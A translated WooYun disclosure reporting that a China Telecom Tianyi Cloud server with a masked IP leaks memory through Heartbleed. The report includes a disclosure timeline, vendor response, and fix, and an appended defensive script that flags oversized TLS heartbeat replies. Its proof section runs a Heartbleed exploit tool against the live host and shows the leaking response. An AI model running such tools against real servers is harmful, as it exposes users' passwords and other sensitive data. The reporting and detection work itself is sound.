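Vulnerability Summary
Bug ID: wooyun-2015-0154477
Title: China Telecom Tianyi Cloud is affected by the Heartbleed vulnerability (can leak user passwords)
Vendor: Tianyi Cloud (天翼云)
Author: 共产党员
Submitted: 2015-11-20 13:00
Fixed: 2016-01-11 15:32
Published: 2016-01-11 15:32
Vulnerability type: System/service patches not applied in time
Severity: Medium
Self-assessed Rank: 10
Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling
Source: http://www.wooyun.org
Tags: None
Vulnerability Details
Disclosure status:
2015-11-20: Details reported to the vendor; awaiting vendor handling
2015-11-24: Vendor confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in related fields
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
Brief description:
RT
Detailed description:
**.**.**.** is affected by the Heartbleed vulnerability.
Passwords and other sensitive information can be obtained; I did not capture any more than this.
Proof of vulnerability: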
sudo python pyheartbleed.py **.**.**.**
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3461
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
Remediation:
Upgrade OpenSSL
Copyright notice: when reposting, please credit the source 共产党员@WooYun
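A defender's view of the record sizes in the proof output, as an added example that is not part of the original report or the tool it used: it reads only the cleartext TLS record headers from each direction of a captured session and flags heartbeat records (type 24) whose response is far larger than the request it answers. The function names, the `slack` threshold and the sample streams are assumptions made for illustration; the sample bodies are zero-filled and constructed, with server record lengths taken from the output above.

```python
import struct

HEARTBEAT = 24  # TLS record content type; shown as "type = 24" in the proof output

def records(stream: bytes):
    """Yield (content_type, version, length) for each complete TLS record."""
    off = 0
    while off + 5 <= len(stream):
        ctype, version, length = struct.unpack_from(">BHH", stream, off)
        if off + 5 + length > len(stream):
            break  # truncated capture: stop rather than guess
        yield ctype, version, length
        off += 5 + length

def suspicious_heartbeats(client: bytes, server: bytes, slack: int = 64):
    """Pair heartbeat records by order of appearance and return
    (request_len, response_len) pairs where the response is more than
    `slack` bytes larger than the request. A normal response echoes the
    request payload, so only the sender-chosen padding should differ.
    `slack` is an assumed tolerance for that difference."""
    req = [n for t, _, n in records(client) if t == HEARTBEAT]
    rsp = [n for t, _, n in records(server) if t == HEARTBEAT]
    return [(q, r) for q, r in zip(req, rsp) if r > q + slack]

def record(ctype: int, length: int, version: int = 0x0302) -> bytes:
    """Build a constructed record: real 5-byte header, zero-filled body."""
    return struct.pack(">BHH", ctype, version, length) + bytes(length)

# Constructed session shaped like the proof output: four handshake records
# from the server, then a 16384-byte heartbeat record answering a small
# request (19 bytes is an assumed request size for the sample).
LEAKY_CLIENT = record(22, 200) + record(HEARTBEAT, 19)
LEAKY_SERVER = (record(22, 66) + record(22, 3461) + record(22, 331)
                + record(22, 4) + record(HEARTBEAT, 16384))

# Constructed normal session: the response is the same size as the request.
NORMAL_CLIENT = record(22, 200) + record(HEARTBEAT, 40)
NORMAL_SERVER = record(22, 66) + record(HEARTBEAT, 40)

if __name__ == "__main__":
    print("leaky :", suspicious_heartbeats(LEAKY_CLIENT, LEAKY_SERVER))
    print("normal:", suspicious_heartbeats(NORMAL_CLIENT, NORMAL_SERVER))
```

Because the check uses only record headers, it also applies when the heartbeat bodies are encrypted.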
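Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-24 17:35
Vendor reply:
CNVD has confirmed and reproduced the reported issue and has passed it to CNCERT to notify China Telecom Group Corporation, which will coordinate follow-up handling with the website's administrators.
Latest status:
None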